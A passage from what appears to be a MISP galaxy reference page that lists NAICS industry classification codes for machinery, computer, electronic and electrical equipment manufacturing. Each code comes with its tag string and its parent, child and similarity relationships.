  • parent-of: misp-galaxy:naics="333241" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333242" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333243" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333248" with estimative-language:likelihood-probability="likely"

33324

Industrial Machinery Manufacturing

The tag is: misp-galaxy:naics="33324"

33324 has relationships with:

  • child-of: misp-galaxy:naics="3332" with estimative-language:likelihood-probability="likely"

333241

Food Product Machinery Manufacturing

The tag is: misp-galaxy:naics="333241"

333241 has relationships with:

  • child-of: misp-galaxy:naics="3332" with estimative-language:likelihood-probability="likely"

333242

Semiconductor Machinery Manufacturing

The tag is: misp-galaxy:naics="333242"

333242 has relationships with:

  • child-of: misp-galaxy:naics="3332" with estimative-language:likelihood-probability="likely"

333243

Sawmill, Woodworking, and Paper Machinery Manufacturing

The tag is: misp-galaxy:naics="333243"

333243 has relationships with:

  • child-of: misp-galaxy:naics="3332" with estimative-language:likelihood-probability="likely"

333248

All Other Industrial Machinery Manufacturing

The tag is: misp-galaxy:naics="333248"

333248 has relationships with:

  • child-of: misp-galaxy:naics="3332" with estimative-language:likelihood-probability="likely"

3333

Commercial and Service Industry Machinery Manufacturing

The tag is: misp-galaxy:naics="3333"

3333 has relationships with:

  • child-of: misp-galaxy:naics="333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333310" with estimative-language:likelihood-probability="likely"

33331

Commercial and Service Industry Machinery Manufacturing

The tag is: misp-galaxy:naics="33331"

33331 has relationships with:

  • child-of: misp-galaxy:naics="3333" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="333310" with estimative-language:likelihood-probability="likely"

333310

Commercial and Service Industry Machinery Manufacturing

The tag is: misp-galaxy:naics="333310"

333310 has relationships with:

  • child-of: misp-galaxy:naics="3333" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33331" with estimative-language:likelihood-probability="likely"

3334

Ventilation, Heating, Air-Conditioning, and Commercial Refrigeration Equipment Manufacturing

The tag is: misp-galaxy:naics="3334"

3334 has relationships with:

  • child-of: misp-galaxy:naics="333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33341" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333413" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333414" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333415" with estimative-language:likelihood-probability="likely"

33341

Ventilation, Heating, Air-Conditioning, and Commercial Refrigeration Equipment Manufacturing

The tag is: misp-galaxy:naics="33341"

33341 has relationships with:

  • child-of: misp-galaxy:naics="3334" with estimative-language:likelihood-probability="likely"

333413

Industrial and Commercial Fan and Blower and Air Purification Equipment Manufacturing

The tag is: misp-galaxy:naics="333413"

333413 has relationships with:

  • child-of: misp-galaxy:naics="3334" with estimative-language:likelihood-probability="likely"

333414

Heating Equipment (except Warm Air Furnaces) Manufacturing

The tag is: misp-galaxy:naics="333414"

333414 has relationships with:

  • child-of: misp-galaxy:naics="3334" with estimative-language:likelihood-probability="likely"

333415

Air-Conditioning and Warm Air Heating Equipment and Commercial and Industrial Refrigeration Equipment Manufacturing

The tag is: misp-galaxy:naics="333415"

333415 has relationships with:

  • child-of: misp-galaxy:naics="3334" with estimative-language:likelihood-probability="likely"

3335

Metalworking Machinery Manufacturing

The tag is: misp-galaxy:naics="3335"

3335 has relationships with:

  • child-of: misp-galaxy:naics="333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33351" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333514" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333515" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333517" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333519" with estimative-language:likelihood-probability="likely"

33351

Metalworking Machinery Manufacturing

The tag is: misp-galaxy:naics="33351"

33351 has relationships with:

  • child-of: misp-galaxy:naics="3335" with estimative-language:likelihood-probability="likely"

333511

Industrial Mold Manufacturing

The tag is: misp-galaxy:naics="333511"

333511 has relationships with:

  • child-of: misp-galaxy:naics="3335" with estimative-language:likelihood-probability="likely"

333514

Special Die and Tool, Die Set, Jig, and Fixture Manufacturing

The tag is: misp-galaxy:naics="333514"

333514 has relationships with:

  • child-of: misp-galaxy:naics="3335" with estimative-language:likelihood-probability="likely"

333515

Cutting Tool and Machine Tool Accessory Manufacturing

The tag is: misp-galaxy:naics="333515"

333515 has relationships with:

  • child-of: misp-galaxy:naics="3335" with estimative-language:likelihood-probability="likely"

333517

Machine Tool Manufacturing

The tag is: misp-galaxy:naics="333517"

333517 has relationships with:

  • child-of: misp-galaxy:naics="3335" with estimative-language:likelihood-probability="likely"

333519

Rolling Mill and Other Metalworking Machinery Manufacturing

The tag is: misp-galaxy:naics="333519"

333519 has relationships with:

  • child-of: misp-galaxy:naics="3335" with estimative-language:likelihood-probability="likely"

3336

Engine, Turbine, and Power Transmission Equipment Manufacturing

The tag is: misp-galaxy:naics="3336"

3336 has relationships with:

  • child-of: misp-galaxy:naics="333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33361" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333618" with estimative-language:likelihood-probability="likely"

33361

Engine, Turbine, and Power Transmission Equipment Manufacturing

The tag is: misp-galaxy:naics="33361"

33361 has relationships with:

  • child-of: misp-galaxy:naics="3336" with estimative-language:likelihood-probability="likely"

333611

Turbine and Turbine Generator Set Units Manufacturing

The tag is: misp-galaxy:naics="333611"

333611 has relationships with:

  • child-of: misp-galaxy:naics="3336" with estimative-language:likelihood-probability="likely"

333612

Speed Changer, Industrial High-Speed Drive, and Gear Manufacturing

The tag is: misp-galaxy:naics="333612"

333612 has relationships with:

  • child-of: misp-galaxy:naics="3336" with estimative-language:likelihood-probability="likely"

333613

Mechanical Power Transmission Equipment Manufacturing

The tag is: misp-galaxy:naics="333613"

333613 has relationships with:

  • child-of: misp-galaxy:naics="3336" with estimative-language:likelihood-probability="likely"

333618

Other Engine Equipment Manufacturing

The tag is: misp-galaxy:naics="333618"

333618 has relationships with:

  • child-of: misp-galaxy:naics="3336" with estimative-language:likelihood-probability="likely"

3339

Other General Purpose Machinery Manufacturing

The tag is: misp-galaxy:naics="3339"

3339 has relationships with:

  • child-of: misp-galaxy:naics="333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33391" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333912" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333914" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33392" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333922" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333923" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333924" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33399" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333993" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333994" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333995" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333996" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333998" with estimative-language:likelihood-probability="likely"

33391

Pump and Compressor Manufacturing

The tag is: misp-galaxy:naics="33391"

33391 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333912

Air and Gas Compressor Manufacturing

The tag is: misp-galaxy:naics="333912"

333912 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333914

Measuring, Dispensing, and Other Pumping Equipment Manufacturing

The tag is: misp-galaxy:naics="333914"

333914 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

33392

Material Handling Equipment Manufacturing

The tag is: misp-galaxy:naics="33392"

33392 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333921

Elevator and Moving Stairway Manufacturing

The tag is: misp-galaxy:naics="333921"

333921 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333922

Conveyor and Conveying Equipment Manufacturing

The tag is: misp-galaxy:naics="333922"

333922 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333923

Overhead Traveling Crane, Hoist, and Monorail System Manufacturing

The tag is: misp-galaxy:naics="333923"

333923 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333924

Industrial Truck, Tractor, Trailer, and Stacker Machinery Manufacturing

The tag is: misp-galaxy:naics="333924"

333924 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

33399

All Other General Purpose Machinery Manufacturing

The tag is: misp-galaxy:naics="33399"

33399 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333991

Power-Driven Handtool Manufacturing

The tag is: misp-galaxy:naics="333991"

333991 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333992

Welding and Soldering Equipment Manufacturing

The tag is: misp-galaxy:naics="333992"

333992 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333993

Packaging Machinery Manufacturing

The tag is: misp-galaxy:naics="333993"

333993 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333994

Industrial Process Furnace and Oven Manufacturing

The tag is: misp-galaxy:naics="333994"

333994 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333995

Fluid Power Cylinder and Actuator Manufacturing

The tag is: misp-galaxy:naics="333995"

333995 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333996

Fluid Power Pump and Motor Manufacturing

The tag is: misp-galaxy:naics="333996"

333996 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333998

All Other Miscellaneous General Purpose Machinery Manufacturing

The tag is: misp-galaxy:naics="333998"

333998 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

334

Computer and Electronic Product Manufacturing

The tag is: misp-galaxy:naics="334"

334 has relationships with:

  • parent-of: misp-galaxy:naics="3341" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3342" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3343" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3344" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3346" with estimative-language:likelihood-probability="likely"

3341

Computer and Peripheral Equipment Manufacturing

The tag is: misp-galaxy:naics="3341"

3341 has relationships with:

  • child-of: misp-galaxy:naics="334" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334118" with estimative-language:likelihood-probability="likely"

33411

Computer and Peripheral Equipment Manufacturing

The tag is: misp-galaxy:naics="33411"

33411 has relationships with:

  • child-of: misp-galaxy:naics="3341" with estimative-language:likelihood-probability="likely"

334111

Electronic Computer Manufacturing

The tag is: misp-galaxy:naics="334111"

334111 has relationships with:

  • child-of: misp-galaxy:naics="3341" with estimative-language:likelihood-probability="likely"

334112

Computer Storage Device Manufacturing

The tag is: misp-galaxy:naics="334112"

334112 has relationships with:

  • child-of: misp-galaxy:naics="3341" with estimative-language:likelihood-probability="likely"

334118

Computer Terminal and Other Computer Peripheral Equipment Manufacturing

The tag is: misp-galaxy:naics="334118"

334118 has relationships with:

  • child-of: misp-galaxy:naics="3341" with estimative-language:likelihood-probability="likely"

3342

Communications Equipment Manufacturing

The tag is: misp-galaxy:naics="3342"

3342 has relationships with:

  • child-of: misp-galaxy:naics="334" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33422" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334220" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33429" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334290" with estimative-language:likelihood-probability="likely"

33421

Telephone Apparatus Manufacturing

The tag is: misp-galaxy:naics="33421"

33421 has relationships with:

  • child-of: misp-galaxy:naics="3342" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="334210" with estimative-language:likelihood-probability="likely"

334210

Telephone Apparatus Manufacturing

The tag is: misp-galaxy:naics="334210"

334210 has relationships with:

  • child-of: misp-galaxy:naics="3342" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33421" with estimative-language:likelihood-probability="likely"

33422

Radio and Television Broadcasting and Wireless Communications Equipment Manufacturing

The tag is: misp-galaxy:naics="33422"

33422 has relationships with:

  • child-of: misp-galaxy:naics="3342" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="334220" with estimative-language:likelihood-probability="likely"

334220

Radio and Television Broadcasting and Wireless Communications Equipment Manufacturing

The tag is: misp-galaxy:naics="334220"

334220 has relationships with:

  • child-of: misp-galaxy:naics="3342" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33422" with estimative-language:likelihood-probability="likely"

33429

Other Communications Equipment Manufacturing

The tag is: misp-galaxy:naics="33429"

33429 has relationships with:

  • child-of: misp-galaxy:naics="3342" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="334290" with estimative-language:likelihood-probability="likely"

334290

Other Communications Equipment Manufacturing

The tag is: misp-galaxy:naics="334290"

334290 has relationships with:

  • child-of: misp-galaxy:naics="3342" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33429" with estimative-language:likelihood-probability="likely"

3343

Audio and Video Equipment Manufacturing

The tag is: misp-galaxy:naics="3343"

3343 has relationships with:

  • child-of: misp-galaxy:naics="334" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33431" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334310" with estimative-language:likelihood-probability="likely"

33431

Audio and Video Equipment Manufacturing

The tag is: misp-galaxy:naics="33431"

33431 has relationships with:

  • child-of: misp-galaxy:naics="3343" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="334310" with estimative-language:likelihood-probability="likely"

334310

Audio and Video Equipment Manufacturing

The tag is: misp-galaxy:naics="334310"

334310 has relationships with:

  • child-of: misp-galaxy:naics="3343" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33431" with estimative-language:likelihood-probability="likely"

3344

Semiconductor and Other Electronic Component Manufacturing

The tag is: misp-galaxy:naics="3344"

3344 has relationships with:

  • child-of: misp-galaxy:naics="334" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33441" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334413" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334416" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334417" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334418" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334419" with estimative-language:likelihood-probability="likely"

33441

Semiconductor and Other Electronic Component Manufacturing

The tag is: misp-galaxy:naics="33441"

33441 has relationships with:

  • child-of: misp-galaxy:naics="3344" with estimative-language:likelihood-probability="likely"

334412

Bare Printed Circuit Board Manufacturing

The tag is: misp-galaxy:naics="334412"

334412 has relationships with:

  • child-of: misp-galaxy:naics="3344" with estimative-language:likelihood-probability="likely"

334413

Semiconductor and Related Device Manufacturing

The tag is: misp-galaxy:naics="334413"

334413 has relationships with:

  • child-of: misp-galaxy:naics="3344" with estimative-language:likelihood-probability="likely"

334416

Capacitor, Resistor, Coil, Transformer, and Other Inductor Manufacturing

The tag is: misp-galaxy:naics="334416"

334416 has relationships with:

  • child-of: misp-galaxy:naics="3344" with estimative-language:likelihood-probability="likely"

334417

Electronic Connector Manufacturing

The tag is: misp-galaxy:naics="334417"

334417 has relationships with:

  • child-of: misp-galaxy:naics="3344" with estimative-language:likelihood-probability="likely"

334418

Printed Circuit Assembly (Electronic Assembly) Manufacturing

The tag is: misp-galaxy:naics="334418"

334418 has relationships with:

  • child-of: misp-galaxy:naics="3344" with estimative-language:likelihood-probability="likely"

334419

Other Electronic Component Manufacturing

The tag is: misp-galaxy:naics="334419"

334419 has relationships with:

  • child-of: misp-galaxy:naics="3344" with estimative-language:likelihood-probability="likely"

3345

Navigational, Measuring, Electromedical, and Control Instruments Manufacturing

The tag is: misp-galaxy:naics="3345"

3345 has relationships with:

  • child-of: misp-galaxy:naics="334" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33451" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334510" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334514" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334515" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334516" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334517" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334519" with estimative-language:likelihood-probability="likely"

33451

Navigational, Measuring, Electromedical, and Control Instruments Manufacturing

The tag is: misp-galaxy:naics="33451"

33451 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="334510" with estimative-language:likelihood-probability="likely"

334510

Electromedical and Electrotherapeutic Apparatus Manufacturing

The tag is: misp-galaxy:naics="334510"

334510 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33451" with estimative-language:likelihood-probability="likely"

334511

Search, Detection, Navigation, Guidance, Aeronautical, and Nautical System and Instrument Manufacturing

The tag is: misp-galaxy:naics="334511"

334511 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

334512

Automatic Environmental Control Manufacturing for Residential, Commercial, and Appliance Use

The tag is: misp-galaxy:naics="334512"

334512 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

334513

Instruments and Related Products Manufacturing for Measuring, Displaying, and Controlling Industrial Process Variables

The tag is: misp-galaxy:naics="334513"

334513 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

334514

Totalizing Fluid Meter and Counting Device Manufacturing

The tag is: misp-galaxy:naics="334514"

334514 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

334515

Instrument Manufacturing for Measuring and Testing Electricity and Electrical Signals

The tag is: misp-galaxy:naics="334515"

334515 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

334516

Analytical Laboratory Instrument Manufacturing

The tag is: misp-galaxy:naics="334516"

334516 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

334517

Irradiation Apparatus Manufacturing

The tag is: misp-galaxy:naics="334517"

334517 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

334519

Other Measuring and Controlling Device Manufacturing

The tag is: misp-galaxy:naics="334519"

334519 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

3346

Manufacturing and Reproducing Magnetic and Optical Media

The tag is: misp-galaxy:naics="3346"

3346 has relationships with:

  • child-of: misp-galaxy:naics="334" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33461" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334610" with estimative-language:likelihood-probability="likely"

33461

Manufacturing and Reproducing Magnetic and Optical Media

The tag is: misp-galaxy:naics="33461"

33461 has relationships with:

  • child-of: misp-galaxy:naics="3346" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="334610" with estimative-language:likelihood-probability="likely"

334610

Manufacturing and Reproducing Magnetic and Optical Media

The tag is: misp-galaxy:naics="334610"

334610 has relationships with:

  • child-of: misp-galaxy:naics="3346" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33461" with estimative-language:likelihood-probability="likely"

335

Electrical Equipment, Appliance, and Component Manufacturing

The tag is: misp-galaxy:naics="335"

335 has relationships with:

  • parent-of: misp-galaxy:naics="3351" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3352" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3353" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

3351

Electric Lighting Equipment Manufacturing

The tag is: misp-galaxy:naics="3351"

3351 has relationships with:

  • child-of: misp-galaxy:naics="335" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335139" with estimative-language:likelihood-probability="likely"

33513

Electric Lighting Equipment Manufacturing

The tag is: misp-galaxy:naics="33513"

33513 has relationships with:

  • child-of: misp-galaxy:naics="3351" with estimative-language:likelihood-probability="likely"

335131

Residential Electric Lighting Fixture Manufacturing

The tag is: misp-galaxy:naics="335131"

335131 has relationships with:

  • child-of: misp-galaxy:naics="3351" with estimative-language:likelihood-probability="likely"

335132

Commercial, Industrial, and Institutional Electric Lighting Fixture Manufacturing

The tag is: misp-galaxy:naics="335132"

335132 has relationships with:

  • child-of: misp-galaxy:naics="3351" with estimative-language:likelihood-probability="likely"

335139

Electric Lamp Bulb and Other Lighting Equipment Manufacturing

The tag is: misp-galaxy:naics="335139"

335139 has relationships with:

  • child-of: misp-galaxy:naics="3351" with estimative-language:likelihood-probability="likely"

3352

Household Appliance Manufacturing

The tag is: misp-galaxy:naics="3352"

3352 has relationships with:

  • child-of: misp-galaxy:naics="335" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33521" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33522" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335220" with estimative-language:likelihood-probability="likely"

33521

Small Electrical Appliance Manufacturing

The tag is: misp-galaxy:naics="33521"

33521 has relationships with:

  • child-of: misp-galaxy:naics="3352" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="335210" with estimative-language:likelihood-probability="likely"

335210

Small Electrical Appliance Manufacturing

The tag is: misp-galaxy:naics="335210"

335210 has relationships with:

  • child-of: misp-galaxy:naics="3352" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33521" with estimative-language:likelihood-probability="likely"

33522

Major Household Appliance Manufacturing

The tag is: misp-galaxy:naics="33522"

33522 has relationships with:

  • child-of: misp-galaxy:naics="3352" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="335220" with estimative-language:likelihood-probability="likely"

335220

Major Household Appliance Manufacturing

The tag is: misp-galaxy:naics="335220"

335220 has relationships with:

  • child-of: misp-galaxy:naics="3352" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33522" with estimative-language:likelihood-probability="likely"

3353

Electrical Equipment Manufacturing

The tag is: misp-galaxy:naics="3353"

3353 has relationships with:

  • child-of: misp-galaxy:naics="335" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33531" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335314" with estimative-language:likelihood-probability="likely"

33531

Electrical Equipment Manufacturing

The tag is: misp-galaxy:naics="33531"

33531 has relationships with:

  • child-of: misp-galaxy:naics="3353" with estimative-language:likelihood-probability="likely"

335311

Power, Distribution, and Specialty Transformer Manufacturing

The tag is: misp-galaxy:naics="335311"

335311 has relationships with:

  • child-of: misp-galaxy:naics="3353" with estimative-language:likelihood-probability="likely"

335312

Motor and Generator Manufacturing

The tag is: misp-galaxy:naics="335312"

335312 has relationships with:

  • child-of: misp-galaxy:naics="3353" with estimative-language:likelihood-probability="likely"

335313

Switchgear and Switchboard Apparatus Manufacturing

The tag is: misp-galaxy:naics="335313"

335313 has relationships with:

  • child-of: misp-galaxy:naics="3353" with estimative-language:likelihood-probability="likely"

335314

Relay and Industrial Control Manufacturing

The tag is: misp-galaxy:naics="335314"

335314 has relationships with:

  • child-of: misp-galaxy:naics="3353" with estimative-language:likelihood-probability="likely"

3359

Other Electrical Equipment and Component Manufacturing

The tag is: misp-galaxy:naics="3359"

3359 has relationships with:

  • child-of: misp-galaxy:naics="335" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33591" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33592" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335929" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33593" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335931" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335932" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33599" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335999" with estimative-language:likelihood-probability="likely"

33591

Battery Manufacturing

The tag is: misp-galaxy:naics="33591"

33591 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="335910" with estimative-language:likelihood-probability="likely"

335910

Battery Manufacturing

The tag is: misp-galaxy:naics="335910"

335910 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33591" with estimative-language:likelihood-probability="likely"

33592

Communication and Energy Wire and Cable Manufacturing

The tag is: misp-galaxy:naics="33592"

33592 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

335921

Fiber Optic Cable Manufacturing

The tag is: misp-galaxy:naics="335921"

335921 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

335929

Other Communication and Energy Wire Manufacturing

The tag is: misp-galaxy:naics="335929"

335929 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

33593

Wiring Device Manufacturing

The tag is: misp-galaxy:naics="33593"

33593 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

335931

Current-Carrying Wiring Device Manufacturing

The tag is: misp-galaxy:naics="335931"

335931 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

335932

Noncurrent-Carrying Wiring Device Manufacturing

The tag is: misp-galaxy:naics="335932"

335932 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

33599

All Other Electrical Equipment and Component Manufacturing

The tag is: misp-galaxy:naics="33599"

33599 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

335991

Carbon and Graphite Product Manufacturing

The tag is: misp-galaxy:naics="335991"

335991 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

335999

All Other Miscellaneous Electrical Equipment and Component Manufacturing

